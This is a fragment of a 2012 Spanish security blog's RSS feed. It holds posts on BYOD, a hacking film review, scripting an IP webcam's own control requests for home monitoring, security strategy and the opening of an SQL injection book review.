&lt;div style="text-align: justify;"&gt;
Así&amp;nbsp;que ya sabes, si quieres molar de verdad en las cenas frikis con tus amigos, has de usar estas siglas o mejor aún, la "&lt;b&gt;consumerización&lt;/b&gt;". No&amp;nbsp;esperéis&amp;nbsp;verla en la RAE, la palabra se la he escuchado a un comercial de Apple y tardará por lo menos 3 años en extenderse. Vaya, lo que le saca IOS a Android.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Personalmente uso mi iPad para leer el twitter, las RSS, el mail, PDFs y como plataforma de juegos para el niño. Realmente en todo aquello que sea modo "lectura". Si alguien puede trabajar realmente con él, es que su curro se basa en responder correos con un "si" o un "no" o es un &lt;a href="http://www.formulatv.com/fotos/a/108000/108505/5k7lssidmh6nse1yky4c5fc9f88d1ed_enrique-pastor_m.jpg"&gt;Community Manager&lt;/a&gt;, que por cierto, es otro termino del que se podía hablar mucho.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Fin de la rajada.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5399811056563385935-4824248687998045047?l=www.securitybydefault.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityByDefault/~4/XeVEeG5hQkk" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SecurityByDefault/~3/XeVEeG5hQkk/introduccion-al-byod.html</link><author>noreply@blogger.com (Alejandro Ramos)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-3ipsVLxZRE0/T6P5Adtsk3I/AAAAAAAAG9k/o2S-eGjntdM/s72-c/ipad.png" height="72" width="72" /><thr:total>10</thr:total><feedburner:origLink>http://www.securitybydefault.com/2012/05/introduccion-al-byod.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5399811056563385935.post-9115507082883403765</guid><pubDate>Fri, 04 May 2012 05:30:00 +0000</pubDate><atom:updated>2012-05-04T07:30:06.825+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">cine</category><title>[Cine de Hackers] Free Rainer (Un juego de inteligencia)</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a class="vt-p" href="http://3.bp.blogspot.com/-VbgMCfaqke8/T6ElZ5Xlh_I/AAAAAAAABWY/zZXPvCo4VFk/s1600/unjuegointeligencia1003.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://3.bp.blogspot.com/-VbgMCfaqke8/T6ElZ5Xlh_I/AAAAAAAABWY/zZXPvCo4VFk/s200/unjuegointeligencia1003.jpg" width="140" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
El verano pasado tuve la oportunidad de conocer a la '&lt;a class="vt-p" href="https://twitter.com/#%21/chicadelatele"&gt;chica de la tele&lt;/a&gt;' y como es lógico, le pedí que me recomendase alguna película sobre 'hacking' que hubiese pasado bajo el radar.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Rápidamente me dijo ¿Has visto Free Rainer? Te va a gustar.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Lo cierto es que es un poco complicado encontrar la película (es Alemana y no tiene el tirón del cine Americano) pero finalmente conseguí hacerme con ella.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
A modo de breve resumen contaré que la película gira en torno a un exitoso productor de 'realities' que, estando en la cresta de la ola (premios, excesos, mujeres), sufre un accidente que le hará ver la vida de forma diferente.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Súbitamente se hace consciente de la cantidad de 'basura' que ha generado en forma de programas de TV a cada cual mas idiotizante, y decide cambiar eso.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Para ello, se lanza a hackear el sistema de medición de audiencias para intentar promover otros contenidos en TV.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Lo que me ha gustado de la película es que va bastante mas lejos que las típicas Americanadas: En una película Americana, algún super-oscuro-hacker pergeñaría un descabellado plan empleando algún virus en 3D que lo cambiaría todo.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Esta película es bastante mas 'real', se ve como van avanzando en la investigación, como van cometiendo los típicos errores de prueba / error y en definitiva resulta bastante mas creíble.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Os dejo el trailer en castellano:&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;iframe allowfullscreen="" frameborder="0" height="315" src="http://www.youtube.com/embed/0LcprVZF_1A" width="560"&gt;&lt;/iframe&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;&lt;u&gt;FICHA&lt;/u&gt;&lt;/b&gt;:&lt;br /&gt;
&lt;b&gt;Rigor técnico&lt;/b&gt;: 4/5&lt;br /&gt;
&lt;b&gt;Historia&lt;/b&gt;: 4/5&lt;br /&gt;
&lt;b&gt;Calificación general&lt;/b&gt;: 4/5&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5399811056563385935-9115507082883403765?l=www.securitybydefault.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityByDefault/~4/TG1sjZCO7MU" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SecurityByDefault/~3/TG1sjZCO7MU/cine-de-hackers-free-rainer-un-juego-de.html</link><author>noreply@blogger.com (Yago Jesus)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-VbgMCfaqke8/T6ElZ5Xlh_I/AAAAAAAABWY/zZXPvCo4VFk/s72-c/unjuegointeligencia1003.jpg" height="72" width="72" /><thr:total>6</thr:total><feedburner:origLink>http://www.securitybydefault.com/2012/05/cine-de-hackers-free-rainer-un-juego-de.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5399811056563385935.post-6935257090181081113</guid><pubDate>Thu, 03 May 2012 04:32:00 +0000</pubDate><atom:updated>2012-05-03T06:32:00.306+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">skynet</category><category domain="http://www.blogger.com/atom/ns#">perl</category><category domain="http://www.blogger.com/atom/ns#">webcams</category><category domain="http://www.blogger.com/atom/ns#">home</category><title>¿Jugamos con la webcam?</title><description>&lt;div style="text-align: justify;"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-4tqlICfId30/T6GWqRfTDvI/AAAAAAAAA0Q/jAdQQHMLX1E/s1600/300px-DHS_S_W.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://1.bp.blogspot.com/-4tqlICfId30/T6GWqRfTDvI/AAAAAAAAA0Q/jAdQQHMLX1E/s200/300px-DHS_S_W.gif" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&amp;nbsp; &lt;br /&gt;
No, no penséis que, por el título, el post de hoy es un anuncio pr0n. Ya he hablado varias veces en SbD de la potencia del software &lt;a href="http://www.securitybydefault.com/2010/08/vigilando-la-casa-cuando-no-estas.html"&gt;Motion&lt;/a&gt; para monitorización y grabación de movimientos de estancias, utilizando cámaras de todo tipo.&lt;br /&gt;
&lt;br /&gt;
Llevaba ya tiempo con la idea de evolucionar la cámara IP que tenía en la terraza, que apunta hacia un lado de ésta únicamente, por una cámara motorizada, que permita "echar un vistazo" rápido hacia el otro lado de la misma, para ver si todo está en su sitio o no. Ya sabéis, algo nuevo para alimentar mi propio "&lt;b&gt;Homeland Security&lt;/b&gt;" y darle algo más para hacer a &lt;a href="http://www.securitybydefault.com/2011/05/mi-pequeno-skynet.html"&gt;mi pequeño Skynet&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
En mi labor de búsqueda por algo sencillito, ví que las cámaras de marcas reconocidas costaban más de lo que yo pretendía gastarme. Así, encontré una tienda que vende varios tipos de webcam de este tipo. En general, y por lo que hablé con la gente de la tienda, todas estas webcams de segunda marca, son chinas (yo supongo que las de primera también, pero tienen mejor calidad). Entre otras, probé una de marca &lt;a href="http://www.apexis.com.cn/"&gt;Apexis&lt;/a&gt; que me ha dado bastante buen resultado. Ya sea wireless o cableada, se gestiona mediante un panel web, con versiones para Internet Explorer (un ActiveX), resto de navegadores y móviles.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-wLyid0nJEdo/T6GaS_qcE_I/AAAAAAAAA0c/CWQw6GhtQNQ/s1600/opciones.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="258" src="http://4.bp.blogspot.com/-wLyid0nJEdo/T6GaS_qcE_I/AAAAAAAAA0c/CWQw6GhtQNQ/s400/opciones.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
Es decir, que &lt;b&gt;si NATeamos un puerto desde el router ADSL&lt;/b&gt; hacia la IP de gestión de la webcam, se puede acceder y jugar con ella desde Internet (vamos, tú y todos los que se peguen con una autenticación vulnerable a fuerza bruta y diccionario). Si no es necesario acceder desde un dispositivo móvil limitado, es &lt;b&gt;mejor hacerlo mediante una VPN&lt;/b&gt;. En mi caso, he aprovechado las capacidades de un proxy inverso de Apache con mod_proxy, que requiera un certificado SSL X.509 de cliente como autenticación a la gestión de la misma. De esta manera, aunque el protocolo de acceso utilizado contra la webcam es HTTP, forzar el uso de HTTPS hasta mi proxy inverso, la autenticación (de usuario/contraseña) a través de la red insegura, va cifrada, y la conexión además irá autenticada mediante el certificado válido. &lt;br /&gt;
&lt;br /&gt;
La aplicación web de gestión de la webcam, permite moverla hacia cualquier posición. El firmware de la mía además, permite memorizar hasta 15 posiciones diferentes de la cámara, y por supuesto hacer que la cámara vaya a cualquiera de ellas.&lt;br /&gt;
&lt;br /&gt;
En la foto de abajo podéis ver el panel de gestión de la webcam, y he puesto una foto de una terraza con arena y mar ;D&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-O-t6TFDkGVg/T6GaYIy7_AI/AAAAAAAAA0k/26XjqvKoOdY/s1600/management.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="307" src="http://3.bp.blogspot.com/-O-t6TFDkGVg/T6GaYIy7_AI/AAAAAAAAA0k/26XjqvKoOdY/s400/management.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Trasteando con &lt;a href="https://addons.mozilla.org/en-US/firefox/addon/tamper-data/"&gt;Tamper Data&lt;/a&gt; (últimamente lo uso más que el procesador de textos) me dí cuenta que, al igual que otros equipos caseros que he mirado, la &lt;b&gt;autenticación utilizada para el panel web es &lt;a href="https://en.wikipedia.org/wiki/Basic_access_authentication"&gt;Basic Authentication&lt;/a&gt;&lt;/b&gt;, ni cookies de sesión, ni tokens dinámicos en parámetros ni nada de nada. No se han complicado mucho la existencia esta gente con eso de "la seguridad". Con esto en la mano, ya sólo queda sentarse a &lt;b&gt;probar las diferentes opciones&lt;/b&gt;, y &lt;b&gt;documentarlas/scriptearlas&lt;/b&gt; para poder hacer que la webcam tenga vida propia mediante llamadas mediante línea de comandos, o que sea Skynet quien lo haga en base a sus propias decisiones.&lt;br /&gt;
&lt;br /&gt;
Además, en mi caso particular, el programa Motion que corre cuando no hay ningún habitante en casa, monitoriza la actividad provista por streaming desde la webcam y, cuando detecta movimiento, me avisa y graba en video el mismo. Debido a que la cámara está en el exterior y que dispone de sensores infrarrojos para permitir visión nocturna, no es sencillo ecualizar los parámetros de brillo y contraste para evitar que cualquier cambio de luz genere falsos positivos al programa Motion. Es decir, que según la hora que sea, estaría bien modificarlo a dinámicamente para que la imagen fuese siempre correcta, tanto para la vista como para la monitorización. &lt;br /&gt;
&lt;br /&gt;
Teniendo claro cuáles son las llamadas que se hace al panel web para balancear estos parámetros, es cuestión de aguja e hilo, el añadir a mi bot Gtalk y a Skynet la funcionalidad de mover la webcam a las posiciones pre-memorizadas, y dependiendo de la hora que sea, ajustar dinámicamente el brillo y el modo (50 Hz, 60 Hz o outdoor) &lt;br /&gt;
&lt;br /&gt;
Así, se ven las siguientes peticiones:&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;GET "http://".$ip_webcam."/camera_control.cgi\?param=1\&amp;amp;value=$value";&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
-&amp;gt; Donde $ip_webcam está claro lo que es y el parámetro "value" es un valor de 0 a 240, correspondiente a multiplicar por 16 un valor entre 1 y 15.&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;&amp;nbsp;GET "http://".$ip_webcam."/decoder_control.cgi?command=$x"&lt;/i&gt; // Vete a la posicion memorizada 1&lt;br /&gt;
&lt;br /&gt;
-&amp;gt; En este caso, para mover la cámara a una de las posiciones pre-memorizadas, el valor $x empieza en 31 para la posición 1, 33 para la posición 2, 35 para la 3 y así sucesivamente. Es decir, que $x = 30 + (($pos*2) -1)&lt;br /&gt;
&lt;br /&gt;
Bueno pues si sirve de ayuda a los que tengáis este tipo de webcam, he hecho un par de scripts separados (que en mi casa, son dos funciones dentro de "Skynet") para hacer que se mueva de forma manual a la posición pre-configurada.&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;GET "http://".$ip_webcam."/camera_control.cgi?param=3&amp;amp;value=$x";&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
-&amp;gt; $ip_webcam es la IP de gestión de la webcam y el parámetro "value", es un valor entre 0 y 2, correspondiente a los modos: 50 Mhz, 60 Mhz y Outdoor, respectivamente.&lt;br /&gt;
&lt;br /&gt;
Cuando es de noche, conviene configurar el modo de la webcam a "50 Hz" y de día en modo "Outdoor" &lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;webcam_pos.pl&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;script src="http://pastebin.com/embed_js.php?i=j0Y79Pti"&gt;
&lt;/script&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;webcam_brillo.pl&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;script src="http://pastebin.com/embed_js.php?i=aaPJXnAA"&gt;
&lt;/script&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;&lt;b&gt;DISCLAIMER&lt;/b&gt;: Señores de la Agencia de Protección de Datos: La cámara no la uso para grabar a personas por la calle, ni siquiera de otras casas (no he visto vecinas, ni en mi casa, ni en la de enfrente que merezcan comprar una cámara con zoom). &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5399811056563385935-6935257090181081113?l=www.securitybydefault.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityByDefault/~4/B2dcKew8Pcg" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SecurityByDefault/~3/B2dcKew8Pcg/jugamos-con-la-webcam.html</link><author>noreply@blogger.com (Lorenzo Martínez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-4tqlICfId30/T6GWqRfTDvI/AAAAAAAAA0Q/jAdQQHMLX1E/s72-c/300px-DHS_S_W.gif" height="72" width="72" /><thr:total>10</thr:total><feedburner:origLink>http://www.securitybydefault.com/2012/05/jugamos-con-la-webcam.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5399811056563385935.post-186488304735459343</guid><pubDate>Wed, 02 May 2012 04:32:00 +0000</pubDate><atom:updated>2012-05-02T06:32:00.374+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">evolución</category><category domain="http://www.blogger.com/atom/ns#">estrategia</category><category domain="http://www.blogger.com/atom/ns#">actualidad</category><title>¿Cuánto es suficiente en Seguridad?</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-80-4t-DALok/T3fc_hS3wbI/AAAAAAAAAAM/xGMaYdeboRo/s1600/Fotolia_38396957_XS.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="241" src="http://4.bp.blogspot.com/-80-4t-DALok/T3fc_hS3wbI/AAAAAAAAAAM/xGMaYdeboRo/s320/Fotolia_38396957_XS.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;/div&gt;&lt;div align="right" class="MsoQuote" style="margin-bottom: .0001pt; margin-bottom: 0cm; text-align: right;"&gt;“En una pelea la mejor técnica es no tener una técnica.&lt;/div&gt;&lt;div align="right" class="MsoQuote" style="margin-bottom: .0001pt; margin-bottom: 0cm; text-align: right;"&gt;Mi técnica es el resultado de su técnica.&lt;/div&gt;&lt;div align="right" class="MsoQuote" style="margin-bottom: .0001pt; margin-bottom: 0cm; text-align: right;"&gt;Mi movimiento es el resultado de su movimiento.”&lt;/div&gt;&lt;div align="right" class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm; text-align: right;"&gt;&lt;b&gt;Bruce Lee&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin-bottom: 0cm; text-align: justify;"&gt;&lt;span style="text-align: justify;"&gt;Es un gusto enorme y un placer para mí comenzar mi colaboración para un sitio tan importante como este. En esta primera aportación quiero compartirles algo del contenido de mi charla en el pasado evento ACK Security Conference 2012 realizado en la bella ciudad de Manizales, Colombia y donde tuve la oportunidad de conocer algunos de los mejores profesionales en Seguridad Informática de Latinoamérica y España, entre ellos a mi ahora buen amigo Lorenzo Martínez.&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;"&gt;&lt;span style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="text-align: justify;"&gt;Durante los últimos meses hemos sido testigos de una ofensiva mas fuerte y agresiva contra Empresas y Organismos de Gobierno de las que se hayan visto anteriormente; casos como &lt;a href="http://blogs.rsa.com/rivner/anatomy-of-an-attack/"&gt;RSA&lt;/a&gt;, &lt;a href="http://krebsonsecurity.com/2011/02/hbgary-federal-hacked-by-anonymous/"&gt;HB Gary&lt;/a&gt;, &lt;a href="http://techland.time.com/2012/02/06/fbi-hacked-while-congress-ponders-cybersecurity-legislation/"&gt;FBI&lt;/a&gt;, &lt;a href="http://prohackingtricks.blogspot.com/2011/06/lulzsec-hackers-claim-breach-of-cia.html"&gt;CIA&lt;/a&gt;, &lt;a href="http://www.huffingtonpost.com/2012/03/02/nasa-hack-2011_n_1316797.html"&gt;NASA&lt;/a&gt; etc... nos hacen plantearnos una serie de preguntas ¿Estas Empresas no contaban con los mecanismos de seguridad para detener estos ataques? ¿Realmente no han invertido lo suficiente para protegerse? Si revisamos la anatomía de dichos ataques nos daremos cuenta que en realidad en la mayoría de los casos no son tan sofisticados como pensamos y se concretaron de alguna forma gracias al factor humano ¿Cuál es entonces el problema?&lt;/div&gt;&lt;div class="MsoNormal" style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="text-align: justify;"&gt;El problema es que estamos planteando y enfrentando la situación de una manera inadecuada. Todos sabemos que existen estándares, guías, buenas prácticas, normativas y una cantidad importante de herramientas en el mercado. Hay Empresas que invierten una cantidad importante de recursos para asegurarse de implementar muchos de estos modelos y adquieren herramientas costosas de Seguridad. Sin embargo, esto parece no ser suficiente. Y es que la realidad nos dice que siempre existe un eslabón débil en la cadena que si es identificada por un potencial atacante, puede ser el punto de entrada para un compromiso mayor.&lt;/div&gt;&lt;div class="MsoNormal" style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="text-align: justify;"&gt;Hoy en día se están desarrollando herramientas muy sofisticadas, incluso son diseñadas para evitar ser detectadas por IDS o Antivirus, se encuentran en el mercado negro e incluso se crean a la medida del que lo solicita. Diariamente aparecen miles de muestras de malware cuyo objetivo es ser utilizados en actividades de espionaje o cibercrimen.&lt;/div&gt;&lt;div class="MsoNormal" style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="text-align: justify;"&gt;Ante este complicado escenario ¿qué se puede hacer?&amp;nbsp;Lo más importante es entender que la seguridad debe ser visualizada bajo un enfoque no solo de herramientas y buenas prácticas. Durante mucho tiempo nos hemos concentrado solamente en acciones de defensa y contención, pensando que eso será suficiente. Basta con realizar un pequeño ejercicio de valoración, como por ejemplo revisar las cifras de cuantas empresas realmente cuentan con un área formal de respuesta a incidentes, cuántas de ellas cuentan con planes confiables que se puedan integrar con los de continuidad de negocios. En pocas palabras, no estamos siendo proactivos sino reactivos.&lt;/div&gt;&lt;div class="MsoNormal" style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="text-align: justify;"&gt;Una forma de replantear esta estrategia sería crear modelos eficientes de monitoreo y detección. Para esto es importante diseñar una buena arquitectura de seguridad donde sea posible detectar cualquier situación de amenaza en el menor tiempo posible.&lt;/div&gt;&lt;div class="MsoNormal" style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="text-align: justify;"&gt;Recordando un concepto de uno de los libros que Bill Gates que escribió hace más de una década “Los negocios en la era digital” y que me parece muy interesante. En él planteaba la analogía entre un sistema nervioso humano con un sistema digital. Él menciona en su libro que un sistema digital debe ser lo mas parecido al humano debido a que, cuando nuestros sensores nerviosos detectan una acción amenazante que pueda dañar al organismo, inmediatamente reaccionan enviando un mensaje al cerebro para que este tome acción, como en el caso de que estamos sufriendo una quemadura. Si no fuera así, tendríamos daños muy severos. &lt;/div&gt;&lt;div class="MsoNormal" style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="text-align: justify;"&gt;En el caso de los sistemas de seguridad, estos deben ser diseñados desde la misma óptica de funcionamiento que el sistema nervioso humano. Debemos crear una estructura que permita detectar a tiempo un ataque y en ese momento actuar en consecuencia respondiendo al incidente. Mientras más rápidamente se reaccione, menor será el daño y evitaremos que se extienda y derive en situaciones más graves, como la pérdida de información o el compromiso de sistemas estructurales.&lt;/div&gt;&lt;div class="MsoNormal" style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="text-align: justify;"&gt;Debemos  tener la capacidad de adaptarnos a la forma en que los atacantes  utilizan nuevas técnicas y herramientas para defender los sistemas de  manera eficiente, existe en la actualidad un desfase importante en las  capacidades de los atacantes y de quienes defienden. El personal que se asigne para las tareas de monitoreo, realmente debe estar preparada para identificar incidentes. En la actualidad confiamos en que los sistemas de detección harán todo el trabajo y olvidamos que hay  gente trabajando 24 x 7 creando herramientas capaces de evadir estos sistemas.&lt;/div&gt;&lt;div class="MsoNormal" style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="text-align: justify;"&gt;Podemos elegir entre justificar la asignación presupuestal de cada año al área de seguridad comprando herramientas costosas, realizando evaluaciones de vulnerabilidades y pruebas de penetración solo para cumplir con normativas o realmente replantear y restructurar la forma como vamos a contar con un sistema eficiente de identificación y respuesta. No es cuestión de cuánto se invierta sino en plantear una estrategia inteligente.&lt;/div&gt;&lt;div class="MsoNormal" style="text-align: justify;"&gt;&lt;br /&gt;
&lt;div style="text-align: right;"&gt;Contribución por cortesía de:&amp;nbsp; &lt;a href="http://www.twitter.com/r0bertmart1nez"&gt;Roberto Martínez&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5399811056563385935-186488304735459343?l=www.securitybydefault.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityByDefault/~4/DbZr7jAD9_w" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SecurityByDefault/~3/DbZr7jAD9_w/cuanto-es-suficiente-en-seguridad.html</link><author>noreply@blogger.com (Contribuciones)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-80-4t-DALok/T3fc_hS3wbI/AAAAAAAAAAM/xGMaYdeboRo/s72-c/Fotolia_38396957_XS.jpg" height="72" width="72" /><thr:total>2</thr:total><feedburner:origLink>http://www.securitybydefault.com/2012/05/cuanto-es-suficiente-en-seguridad.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5399811056563385935.post-605382927971494285</guid><pubDate>Mon, 30 Apr 2012 06:23:00 +0000</pubDate><atom:updated>2012-04-30T08:23:00.732+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">libros</category><title>Libro: Hacking de Aplicaciones Web: SQL Injection</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-x22v8nW091s/T5zxcXVswSI/AAAAAAAAG7c/LBDasKsHzMQ/s1600/webhacking.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://4.bp.blogspot.com/-x22v8nW091s/T5zxcXVswSI/AAAAAAAAG7c/LBDasKsHzMQ/s320/webhacking.png" width="249" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Pese a que me manejo en inyecciones de SQL, sobre todo en MySQL,&amp;nbsp;&lt;a href="http://www.informatica64.com/libros.aspx"&gt;compre&lt;/a&gt; un ejemplar de este &lt;b&gt;libro &lt;/b&gt;que detalla exclusivamente esta vulnerabilidad para fortalecer las partes en la que estoy pez, como por ejemplo SQL Server o las técnicas de "Serialized", a la que dedican un capítulo entero. Además siempre aprovecho para poder escribir luego una entrada como esta en el blog :-)&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Los autores son Enrique Rando y Chema Alonso, que ya han publicado otros libros como &lt;a href="http://www.informatica64.com/libros.aspx?id=hackingBuscadores"&gt;Hacking con buscadores&lt;/a&gt; o&amp;nbsp;&lt;a href="http://www.informatica64.com/libros.aspx?id=forense"&gt;Análisis Forense Digital en Entornos Windows&lt;/a&gt;.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
El libro consta de más de &lt;b&gt;250 páginas divididas en cinco capítulos&lt;/b&gt;, desde la detección más básica hasta un análisis de las diferencias entre los distintos motores de bases de datos. En concreto su &lt;a href="http://www.informatica64.com/RecursosLibros/IndiceHackingenaplicacionesweb.pdf"&gt;índice&lt;/a&gt; a grandes rasgos es el siguiente:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;1.- SQL Injection a partir de (casi) cero&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;2.- Serialized SQL Injection&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;3.- Blind SQL Injection&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;4.- Objetivos Llamativos&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;5.- Otras diferencias entre DBMS&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
